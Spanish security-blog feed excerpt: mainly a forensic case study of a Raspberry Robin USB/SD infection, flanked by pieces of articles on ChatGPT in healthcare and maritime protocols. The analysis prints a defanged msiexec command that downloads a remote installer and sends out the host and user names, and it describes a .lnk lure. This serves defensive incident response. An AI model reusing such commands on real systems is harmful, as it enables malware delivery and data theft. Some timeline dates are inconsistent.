<p>En nuestro caso utilizamos Linux, así que buscamos si efectivamente está en la ruta “<em>/etc/orthanc/orthanc.json</em>”. Y, ¡sí que está!</p>



<figure class="wp-block-image size-full is-resized"><img decoding="async" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-32.png" alt="" class="wp-image-31112" width="680" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/image-32.png 703w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-32-300x35.png 300w" sizes="(max-width: 703px) 100vw, 703px" /></figure>



<p>Antes de modificar el archivo comprobamos si una imagen médica que tenemos de una ecografía (US, Ultrasound) se envía correctamente. La manera de comprobarlo es que no nos aparezca ningún error.</p>



<figure class="wp-block-image size-large is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-33-740x30.png" alt="" class="wp-image-31113" width="838" height="34" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/image-33-740x30.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-33-300x12.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-33-768x31.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-33.png 886w" sizes="(max-width: 838px) 100vw, 838px" /></figure>



<p>Ahora sí que vamos a editar el archivo y reiniciamos el servicio Orthanc, como nos ha indicado ChatGPT anteriormente. Añadimos el fragmento que nos ha dicho en el punto 3, permitiendo solo el envío de imágenes de TACs (CT) y Resonancias Magnéticas (MR), por tanto no nos debería aceptar la imagen que hemos enviado anteriormente.</p>



<p>A continuación, lanzamos el mismo comando que antes con la ecografía y nos aparece que esta conexión se rechaza. Consiguiendo limitar la conexión remota únicamente a las modalidades que queremos, en este caso TACs y Resonancias Magnéticas.</p>



<figure class="wp-block-image size-large is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-34-740x46.png" alt="" class="wp-image-31114" width="838" height="52" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/image-34-740x46.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-34-300x19.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-34-768x48.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-34.png 886w" sizes="(max-width: 838px) 100vw, 838px" /></figure>



<p>Por otro lado, se le puede preguntar que otras acciones se pueden realizar para limitar el acceso mediante el archivo “<em>orthanc.json</em>”. Donde nos listará varias de las entradas que pueden ser modificadas y para qué sirven cada una de ellas.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full is-resized"><img decoding="async" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-35.png" alt="" class="wp-image-31115" width="680" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/image-35.png 724w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-35-270x300.png 270w" sizes="(max-width: 724px) 100vw, 724px" /></figure></div>


<p>Se debe tener en cuenta que las instrucciones de ChatGPT no siempre son correctas y pueden contener fallos o estar sujetas a versiones antiguas y que hayan cambiado los procedimientos, pero sigue siendo una herramienta de ayuda muy rápida. También es importante tener en cuenta los datos que se envían a ChatGPT considerando que no sean sensibles o con información confidencial.</p>



<h1 class="wp-block-heading">Controversia con chatGPT</h1>



<p>Hemos visto las aplicaciones que tiene ChatGPT en salud y las ventajas que supone. Pero es normal que aparezca la duda de si estas tecnologías sustituirán a las personas en un futuro. Una reciente noticia afirma que las respuestas de ChatGPT sobre medicina son más certeras que las de los médicos, pero, ¿hasta qué punto esto es real o seguirá siéndolo? </p>



<p>No debemos olvidar que ChatGPT sigue siendo un modelo de aprendizaje, es decir, ha aprendido a decir cuáles son las respuestas correctas y tiene más capacidad de conocimiento que una persona. Además, actualmente, la información recogida por ChatGPT está actualizada hasta septiembre 2021, por tanto, esta información puede quedar obsoleta con el paso del tiempo si no se actualiza. Sin embargo, y lo más importante, ChatGPT no es humano. El modelo carece de guía ética y de juicio clínico. No tiene empatía y las personas suelen preferir el contacto humano a la hora de gestionar sus problemas.</p>



<p>Por estas razones, ChatGPT es una herramienta muy útil pero que debe utilizarse como una <strong>herramienta de soporte</strong> y no de sustitución. Es decir, una herramienta que ayude al personal sanitario a gestionar tareas repetitivas o realizar una primera aproximación a falta de una revisión profesional.</p>



<h1 class="wp-block-heading">Conclusión</h1>



<p>En conclusión, ChatGPT es una tecnología prometedora que tiene el potencial de mejorar significativamente la eficiencia y la calidad de la atención médica, especialmente en la promoción de la salud y la prevención de enfermedades, así como en la educación de la salud. A medida que la tecnología continúa evolucionando, es probable que veamos una mayor integración de ChatGPT en este campo en el futuro, pero siempre como una herramienta de apoyo y no como sustitución de nuestros profesionales sanitarios.</p>



<h1 class="wp-block-heading">Referencias</h1>



<ul>
<li><a href="https://www.rocheplus.es/innovacion/investigacion-ciencia/ChatGPT.html">https://www.rocheplus.es/innovacion/investigacion-ciencia/ChatGPT.html</a></li>



<li><a href="https://journals.plos.org/digitalhealth/article?id=10.1371/journal.pdig.0000168">https://journals.plos.org/digitalhealth/article?id=10.1371/journal.pdig.0000168</a></li>



<li><a href="https://www.mediktor.com/es">https://www.mediktor.com/es</a></li>



<li><a href="https://www.clinicbarcelona.org/noticias/el-hospital-clinic-firma-un-acuerdo-con-mediktor-para-validar-su-aplicacion-que-permite-desarrollar-un-triaje-mas-eficiente">https://www.clinicbarcelona.org/noticias/el-hospital-clinic-firma-un-acuerdo-con-mediktor-para-validar-su-aplicacion-que-permite-desarrollar-un-triaje-mas-eficiente</a></li>



<li><a href="https://gpt3demo.com/apps/glass-ai-health">https://GPT3demo.com/apps/glass-ai-health</a></li>



<li><a href="https://healthitanalytics.com/news/adventist-health-leverages-ai-powered-chatbot-for-diabetes-care">HealthITAnalytics: &#8220;Adventist Health Leverages AI-Powered Chatbot for Diabetes Care&#8221;</a></li>



<li><a href="https://www.mdpi.com/2227-9032/11/6/887">https://www.mdpi.com/2227-9032/11/6/887</a></li>



<li><a href="https://www.insider.com/chatgpt-passes-medical-exam-diagnoses-rare-condition-2023-4">https://www.insider.com/chatGPT-passes-medical-exam-diagnoses-rare-condition-2023-4</a></li>
</ul>
<p>La entrada <a rel="nofollow" href="https://www.securityartwork.es/2023/09/11/aplicacion-de-chatgpt-al-ambito-de-la-salud/">Aplicación de ChatGPT al ámbito de la salud</a> aparece primero en <a rel="nofollow" href="https://www.securityartwork.es">Security Art Work</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.securityartwork.es/2023/09/11/aplicacion-de-chatgpt-al-ambito-de-la-salud/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Raspberry Robin: caso real de análisis forense</title>
		<link>https://www.securityartwork.es/2023/09/07/raspberry-robin-caso-real-de-analisis-forense/</link>
					<comments>https://www.securityartwork.es/2023/09/07/raspberry-robin-caso-real-de-analisis-forense/#respond</comments>
		
		<dc:creator><![CDATA[Luis Fueris]]></dc:creator>
		<pubDate>Thu, 07 Sep 2023 08:31:54 +0000</pubDate>
				<category><![CDATA[General]]></category>
		<guid isPermaLink="false">https://www.securityartwork.es/?p=31067</guid>

					<description><![CDATA[<p>Raspberry Robin fue una amenaza latente durante el año 2022, causando múltiples incidentes en organizaciones de diferente índole. Dicha amenaza posee como vector de entrada un medio extraíble, una tarjeta SD o un USB drive. Raspberry Robin pertenece a un gran ecosistema para desplegar IcedID, BlumbleBee y TrueBot. Principalmente, es liderado por DEV-0243 (DEV-0206 and [&#8230;]</p>
<p>La entrada <a rel="nofollow" href="https://www.securityartwork.es/2023/09/07/raspberry-robin-caso-real-de-analisis-forense/">Raspberry Robin: caso real de análisis forense</a> aparece primero en <a rel="nofollow" href="https://www.securityartwork.es">Security Art Work</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p><em>Raspberry Robin </em>fue una amenaza latente durante el año 2022, causando múltiples incidentes en organizaciones de diferente índole. Dicha amenaza posee como vector de entrada un medio extraíble, una tarjeta SD o un USB drive. <em>Raspberry Robin </em>pertenece a un gran ecosistema para desplegar <em>IcedID</em>, <em>BlumbleBee </em>y <em>TrueBot</em>. </p>



<p>Principalmente, es liderado por DEV-0243 (<em><a href="https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/">DEV-0206 and DEV-0243: An “evil” partnership</a></em>), aunque se ha visto usado por actores como DEV-0950 (FIN11/TA505). Este despliega el <em>ransomware </em>Clop en la última etapa. Red Canary (<a href="https://redcanary.com/blog/raspberry-robin/"><em>Raspberry Robin gets the worm early</em></a>) y Microsoft (<a href="https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosy stem-facilitating-pre-ransomware-activity/"><em>A new worm hatches: Raspberry Robin’s initial propagation via USB drives</em></a>) publicaron extensos artículos sobre las técnicas, tácticas y procedimientos ejecutados por <em>Raspberry Robin</em>.</p>



<span id="more-31067"></span>



<p>Cabe destacar el uso de ingeniería social a la hora de ejecutar el segundo <em>stage </em>debido a que, desde Windows 7, autorun está deshabilitado por defecto. Este paso es ejecutado mediante un fichero .lnk de forma consciente por el usuario. Dicho fichero es camuflado con el nombre o marca del medio extraíble. </p>



<p>Por ejemplo: USB DISK (16GB).lnk, Kingston.lnk, Unidad USB.lnk (Figura 1).</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-740x319.png" alt="" class="wp-image-31068" width="384" height="166" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/image-740x319.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-300x130.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/09/image.png 769w" sizes="(max-width: 384px) 100vw, 384px" /><figcaption class="wp-element-caption">Figura 1: Ejemplo de fichero .lnk en F:</figcaption></figure></div>


<h3 class="wp-block-heading"><strong>Killchain</strong></h3>



<p>La <em>killchain </em>ejecutada por Raspberry Robin se muestra en la Figura 2.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-1-740x168.png" alt="" class="wp-image-31069" width="680" height="154" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/image-1-740x168.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-1-300x68.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-1-768x174.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-1.png 1046w" sizes="(max-width: 680px) 100vw, 680px" /><figcaption class="wp-element-caption">Figura 2: Killchain Raspberry Robin</figcaption></figure></div>


<ul>
<li>Usuario hace click en un fichero .lnk mediante ingeniería social. El fichero se puede llamar, por ejemplo, <em>Unidad USB.lnk</em> y estar en el directorio raíz del medio extraíble.</li>



<li>El fichero .lnk ejecuta un cmd.exe que posee como parámetro otro fichero con dos ejecuciones:
<ul>
<li><em>explorer.exe</em> para abrir el medio extraíble del usuario, nombre de una persona o el propio fichero .lnk Múltiples artículos no han sabido el propósito de esta ejecución.</li>



<li><em>msiexec.exe</em> para contactar contra el C2C que descarga y ejecuta una DLL maliciosa.</li>
</ul>
</li>



<li>Contacto contra C2C en la red TOR mediante la DLL.</li>
</ul>



<p>Para obtener más información de la persistencia se pueden consultar los artículos de Red Canary y Microsoft. Este artículo está enfocado a un caso práctico de análisis forense de las primeras etapas de <em>Raspberry Robin</em>.</p>



<h2 class="wp-block-heading"><strong>Análisis forense</strong></h2>



<p>A la hora de realizar un análisis forense de un activo, es necesario acotar el evento en el tiempo. El evento puede provenir de una alerta SIEM, consola de EDR/Antivirus, conexión anómala en el firewall, aviso por parte del usuario etc. De este modo, las acciones que crearon la alerta deberán estar antes del evento. En muchas ocasiones, hay activos con un gran ciclo de vida y es crucial acotar la hora del incidente.</p>



<p>En este caso que nos concierne, el activo a analizar no estaba integrado en SIEM ni EDR. El usuario avisó de múltiples alertas de antivirus a lo largo de mayo. El objetivo de este análisis fue identificar el dispositivo o medio extraíble, así como el usuario que iniciaron la infección. Fue necesario realizar un triaje del equipo para saber su procedencia. De este modo, se empezó analizando las alertas que correspondían a Microsoft Defender en el fichero Microsoft-Windows-Windows-Defender Operational.evtx Figuras 3, 4.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><a href="https://www.securityartwork.es/wp-content/uploads/2023/09/dfir-defender-log-1605-02.jpg" rel="lightbox[31067]"><img decoding="async" loading="lazy" width="726" height="151" src="https://www.securityartwork.es/wp-content/uploads/2023/09/dfir-defender-log-1605-02.jpg" alt="" class="wp-image-31086" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/dfir-defender-log-1605-02.jpg 726w, https://www.securityartwork.es/wp-content/uploads/2023/09/dfir-defender-log-1605-02-300x62.jpg 300w" sizes="(max-width: 726px) 100vw, 726px" /></a><figcaption class="wp-element-caption">Figura 3: Múltiples alertas Windows Defender</figcaption></figure></div>

<div class="wp-block-image">
<figure class="aligncenter size-large"><a href="https://www.securityartwork.es/wp-content/uploads/2023/09/image-16.png" rel="lightbox[31067]"><img decoding="async" loading="lazy" width="740" height="243" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-16-740x243.png" alt="" class="wp-image-31087" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/image-16-740x243.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-16-300x98.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-16-768x252.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-16.png 1316w" sizes="(max-width: 740px) 100vw, 740px" /></a><figcaption class="wp-element-caption">Figura 4: Múltiples alertas Windows Defender</figcaption></figure></div>


<p>La primera alerta corresponde al 22 de abril de 2022 a las 16:11:48. Esta fecha será importante a lo largo del análisis. El antivirus Microsoft Defender bloqueó la siguiente ejecución:</p>



<p class="has-small-font-size"><code><em><strong>C\Windows\System32\msiexec . exe /q −ihxxP ://mIrW [ . ] Wf:8080/zNzxV2Wku44&lt;HOSTNAME&gt;?&lt;USER&gt;</strong></em></code></p>



<p>La alerta proporciona la firma <em>Trojan:Win32/Cerobgar.A</em>. Sin embargo, la ejecución indica también el dominio <em>hxxp://mirw[.]wf:8080</em>. Con este indicador, ya clasificado en fuentes abiertas, es trivial identificar la amenaza <em>Raspberry Robin</em>. Además, los artículos de Red Canary y Microsoft identifican de forma directa dicha amenaza.</p>



<p>El nombre del activo así como el usuario son exfiltrados. Las opciones usadas son:</p>



<ul>
<li><em>/q</em> indica ejecución sin interfaz de usuario, por lo tanto, no habrá interacción.</li>



<li><em>-i </em>Instalación del paquete msi remoto.</li>
</ul>



<p>Notemos que el objetivo de este comando es seguir el proceso de infección. El post de Red Canary desgrana a la perfección los diferentes <em>stages</em>. Los C2C utilizados por <em>Raspberry Robin </em>son servidores QNAP (NAS) comprometidos (Figuras 5 y 6).</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-5-740x306.png" alt="" class="wp-image-31073" width="640" height="265" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/image-5-740x306.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-5-300x124.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-5-768x318.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-5.png 1357w" sizes="(max-width: 640px) 100vw, 640px" /><figcaption class="wp-element-caption">Figura 5: Imágenes de QNAP comprometida</figcaption></figure></div>

<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-6-740x552.png" alt="" class="wp-image-31074" width="445" height="332" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/image-6-740x552.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-6-300x224.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-6-768x572.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-6.png 923w" sizes="(max-width: 445px) 100vw, 445px" /><figcaption class="wp-element-caption">Figura 6: Imagen de QNAP comprometida</figcaption></figure></div>


<p>La alerta de antivirus es el primer artefacto que ha sido analizado. En nuestro caso, La MFT es una evidencia básica que analizar. Hay que recordar que la primera alerta de Microsoft Defender es el 22 de abril a las 16:11:48 UTC. A partir de aquí habrá que analizar los eventos causantes de la alerta. En ese mismo día y hora, la MFT muestra los siguientes ficheros creados.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><a href="https://www.securityartwork.es/wp-content/uploads/2023/09/image-17.png" rel="lightbox[31067]"><img decoding="async" loading="lazy" width="740" height="281" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-17-740x281.png" alt="" class="wp-image-31088" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/image-17-740x281.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-17-300x114.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-17-768x291.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-17-1536x583.png 1536w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-17.png 2000w" sizes="(max-width: 740px) 100vw, 740px" /></a><figcaption class="wp-element-caption">Figura 7: Ficheros creados en MFT</figcaption></figure></div>


<p>En primer lugar, hay una creación de ficheros de <em>log </em>en Microsoft Defender. Estos ficheros de <em>log </em>son creados a la misma hora que se genera la alerta. Un minuto más tarde se crea el fichero AJ2109240970.lnk (RecentLink). Por lo tanto, antes de abrir el fichero AJ2109240970, el usuario ha hecho alguna acción para generar la alerta. Veamos también la creación de un fichero Prefetch de Microsoft Photos a las 16:12. De este modo, podemos deducir que el fichero AJ2109240970 se trata de una imagen abierta.</p>



<p>El principal vector de entrada de <em>Raspberry Robin </em>es un medio extraíble, por lo que el día 22 de mayo se debió insertar un dispositivo de este tipo. La Figura 8 muestra las conexiones de medios extraíbles. En este caso, la información ha sido obtenida mediante el <em>log </em>Setupapi y <em>hives </em>SYSTEM, SOFTWARE, NTUSER.DAT y Amcache.hve.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><a href="https://www.securityartwork.es/wp-content/uploads/2023/09/image-9.png" rel="lightbox[31067]"><img decoding="async" loading="lazy" width="740" height="120" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-9-740x120.png" alt="" class="wp-image-31077" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/image-9-740x120.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-9-300x49.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-9-768x125.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-9-1536x250.png 1536w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-9.png 1705w" sizes="(max-width: 740px) 100vw, 740px" /></a><figcaption class="wp-element-caption">Figura 8: Dispositivos conectados</figcaption></figure></div>


<p>Matizar que hay dos dispositivos, <em>Generic SD/MMC USB (E:\, D:\)</em> y <em>USB SanDisk 3.2Gen 1 USB Device (G:\)</em>. La primera conexión de ambos fue el día 22 de abril. Esto indica que uno de los<sup> &nbsp;</sup>dos medios extraíbles tiene el fichero .lnk que ha sido ejecutado por el usuario.</p>



<p>Un artefacto interesante para evidenciar la navegación por el sistema de ficheros son las claves shellbags (Figura 9). Su valor es obtenido del <em>hive </em>NTUSER.DAT del usuario a investigar.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><a href="https://www.securityartwork.es/wp-content/uploads/2023/09/image-10.png" rel="lightbox[31067]"><img decoding="async" loading="lazy" width="740" height="489" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-10-740x489.png" alt="" class="wp-image-31078" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/image-10-740x489.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-10-300x198.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-10-768x508.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-10.png 1268w" sizes="(max-width: 740px) 100vw, 740px" /></a><figcaption class="wp-element-caption">Figura 9: Shellbags del usuario</figcaption></figure></div>


<p>El día 22 de abril a las 16:11:48 accedió a la unidad D:\. En este mismo instante se disparó la alerta de Microsoft Defender. De este modo, el fichero .lnk debería estar dentro de la unidad D:\ que corresponde a una tarjeta SD (<em>Generic SD/MMC USB</em>). La clave de registro <em>UserAssist </em>es un buen punto de comienzo para saber las ejecuciones del usuario en el sistema de ficheros. La Figura 10 muestra este valor.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><a href="https://www.securityartwork.es/wp-content/uploads/2023/09/image-11.png" rel="lightbox[31067]"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-11-740x439.png" alt="" class="wp-image-31079" width="401" height="238" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/image-11-740x439.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-11-300x178.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-11-768x456.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-11.png 1183w" sizes="(max-width: 401px) 100vw, 401px" /></a><figcaption class="wp-element-caption">Figura 10: Clave de registro UserAssist</figcaption></figure></div>


<p>Notemos que el fichero D:\Unidad USB.lnk es accedido a las 16:11:47, un segundo antes de la ejecución del <em>msiexec </em>que generó la alerta en Microsoft Defender. Por lo tanto, se puede evidenciar que la tarjeta SD está infectada con <em>Raspberry Robin</em>. Además, es posible evidenciar la ejecución del msiexec con el artefacto Amcache.hve del usuario (Figura 11).</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-12-740x82.png" alt="" class="wp-image-31080" width="584" height="65" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/image-12-740x82.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-12-300x33.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-12-768x85.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-12.png 1181w" sizes="(max-width: 584px) 100vw, 584px" /><figcaption class="wp-element-caption">Figura 11: Valores Amcache.hve</figcaption></figure></div>


<p>Otro punto interesante es saber si la unidad USB con etiqueta G:\ está infectada. El 17 de mayo a las 07:57:17 se produce un acceso a G:\. Sin embargo, no es posible realizar una correlación directa con una alerta de Microsoft Defender. La última alerta de este fue el 16 de mayo.</p>



<p>Un artefacto para identificar al usuario serían los registros Windows. El fichero Security.evtx nos indica eventos 4624, autenticación satisfactoria, del usuario que insertó el medio extraíble y ejecuto el fichero D:\Unidad USB.lnk. Este punto es importante debido al uso del activo por dos usuarios. Ver Figura 12.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><a href="https://www.securityartwork.es/wp-content/uploads/2023/09/image-13.png" rel="lightbox[31067]"><img decoding="async" loading="lazy" width="740" height="414" src="https://www.securityartwork.es/wp-content/uploads/2023/09/image-13-740x414.png" alt="" class="wp-image-31081" srcset="https://www.securityartwork.es/wp-content/uploads/2023/09/image-13-740x414.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-13-300x168.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-13-768x430.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/09/image-13.png 1520w" sizes="(max-width: 740px) 100vw, 740px" /></a><figcaption class="wp-element-caption">Figura 12: Autenticaciones del activo comprometido</figcaption></figure></div>


<p>De este modo, el dispositivo infectado ha sido identificado y el usuario que lo insertó debido a la horquilla temporal de autenticaciones.</p>



<h2 class="wp-block-heading"><strong>Timeline</strong></h2>



<p>Para poner un orden cronológico de los hechos ocurridos en el activo, es importante obtener un <em>timeline </em>del análisis de las evidencias.</p>



<ul>
<li><strong>22/04/2022 07:03:03</strong>. Primera conexión Generic SD/MMC USB Device. Unidades E:\, D:\</li>



<li><strong>22/04/2022 15:30:28</strong>. Primera conexión USB SanDisk 3.2Gen1 USB Device. Unidad G:\</li>



<li><strong>22/04/2022 16:11:47</strong>. Click en D:\Unidad USB.lnk</li>



<li><strong>22/04/2022 16:11:48</strong>. Alerta Microsoft Defender Trojan:Win32/Cerobgar.A</li>



<li><strong>22/04/2022 16:11:57</strong>. Acceso directorio en D:\Unidad USB\FOTOS</li>



<li><strong>22/04/2022 16:12:00</strong>. Múltiples alertas Trojan:Win32/Cerobgar.A y conexiones de Generic SD/MMC USB Device (Unidades E:\ y D:\).</li>



<li><strong>13/05/2023 07:35:12</strong>. Autenticación exitosa usuario, credenciales cacheadas (11).</li>



<li><strong>13/05/2022 07:41:35</strong>. Ultima conexión Generic SD/MMC USB Device. Unidades E:\, D:\</li>



<li><strong>15/05/2022 08:57:57</strong>. Ultima desconexión Generic SD/MMC USB Device (Unidades E:\, y D:\)</li>



<li><strong>15/05/2023 08:08:25</strong>. Autenticación exitosa usuario, credenciales cacheadas (11).</li>



<li><strong>15/05/2022 &#8211; 16/05/2022</strong>. Múltiples alertas Trojan:Win32/Cerobgar.A</li>



<li><strong>17/05/2023 07:02:32</strong>. Autenticación exitosa usuario, credenciales cacheadas (11)</li>



<li><strong>17/05/2022 07:54:58</strong>. Ultima conexión<sup> </sup>USB SanDisk 3.2Gen1 USB Device (Unidad G:\)</li>



<li><strong>17/05/2022 10:00:54</strong>. Ultima desconexión<sup> </sup>USB SanDisk 3.2Gen1 USB Device (Unidad G:\)</li>
</ul>



<h2 class="wp-block-heading"><strong>Conclusión</strong></h2>



<p>Debido al análisis de las evidencias, se ha identificado que la tarjeta SD (Generic SD/MMC USB Device) está infectada. Además, es posible que el usuario copiara desde la tarjeta SD al USB USB SanDisk 3.2Gen1 USB Device un directorio ya que poseen el mismo nombre. En este caso, no se puede evidenciar que la unidad USB esté infectada pero hay una gran probabilidad. Finalmente, el dispositivo extraíble ha sido identificado así como el usuario que desencadenó la ejecución del fichero .lnk.</p>



<h2 class="wp-block-heading"><strong>Referencias</strong></h2>



<ul>
<li>Microsoft.com: <a href="https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/">DEV-0206 and DEV-0243: An “evil” partnership</a></li>



<li>RedCanary: <a href="https://redcanary.com/blog/raspberry-robin/">Raspberry Robin gets the worm early</a></li>



<li>Microsoft.com: <a href="https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosy stem-facilitating-pre-ransomware-activity/">A new worm hatches: Raspberry Robin’s initial propagation via USB drives</a></li>



<li>Cybereason.com <a href="https://www.cybereason.com/blog/threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qna p-devices">THREAT ALERT: Raspberry Robin Worm Abuses Windows Installer and QNAP Devices</a></li>
</ul>
<p>La entrada <a rel="nofollow" href="https://www.securityartwork.es/2023/09/07/raspberry-robin-caso-real-de-analisis-forense/">Raspberry Robin: caso real de análisis forense</a> aparece primero en <a rel="nofollow" href="https://www.securityartwork.es">Security Art Work</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.securityartwork.es/2023/09/07/raspberry-robin-caso-real-de-analisis-forense/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Ciberseguridad en el sector naval: Protocolos marítimos de comunicación</title>
		<link>https://www.securityartwork.es/2023/08/16/ciberseguridad-en-el-sector-naval-protocolos-maritimos-de-comunicacion/</link>
					<comments>https://www.securityartwork.es/2023/08/16/ciberseguridad-en-el-sector-naval-protocolos-maritimos-de-comunicacion/#respond</comments>
		
		<dc:creator><![CDATA[David Enrique Juan San Valero]]></dc:creator>
		<pubDate>Wed, 16 Aug 2023 12:05:04 +0000</pubDate>
				<category><![CDATA[Ciberseguridad industrial]]></category>
		<guid isPermaLink="false">https://www.securityartwork.es/?p=31059</guid>

					<description><![CDATA[<p>El transporte marítimo constituye un pilar fundamental de la economía global, y como todo sistema que esté adoptando las nuevas tecnologías de conectividad, está sujeto a riesgos de ciberseguridad. En el artículo “Nuevos requisitos de ciberseguridad en construcción naval: implicaciones en el proceso de ingeniería y diseños de nuevos buques” comentamos la creciente conectividad de [&#8230;]</p>
<p>La entrada <a rel="nofollow" href="https://www.securityartwork.es/2023/08/16/ciberseguridad-en-el-sector-naval-protocolos-maritimos-de-comunicacion/">Ciberseguridad en el sector naval: Protocolos marítimos de comunicación</a> aparece primero en <a rel="nofollow" href="https://www.securityartwork.es">Security Art Work</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>El <strong>transporte marítimo</strong> constituye un pilar fundamental de la economía global, y como todo sistema que esté adoptando las nuevas tecnologías de conectividad, está <strong>sujeto a riesgos de ciberseguridad</strong>. En el artículo “<em><a href="https://www.securityartwork.es/2023/03/15/nuevos-requisitos-de-ciberseguridad-en-construccion-naval-implicaciones-en-el-proceso-de-ingenieria-y-disenos-de-nuevos-buques/">Nuevos requisitos de ciberseguridad en construcción naval: implicaciones en el proceso de ingeniería y diseños de nuevos buques</a></em>” comentamos la creciente conectividad de los nuevos buques, así como la baja madurez en ciberseguridad existente en este ámbito y las problemáticas habituales encontradas en sus sistemas. Estas características, unidas al incremento de los ciberataques, está impulsando la creación de estándares y certificaciones de obligado cumplimiento para los nuevos buques. Sin embargo, los problemas no son únicamente de naturaleza procedimental. Veamos uno de los aspectos técnicos de gran relevancia, los <strong>protocolos de comunicación marítima</strong>.</p>



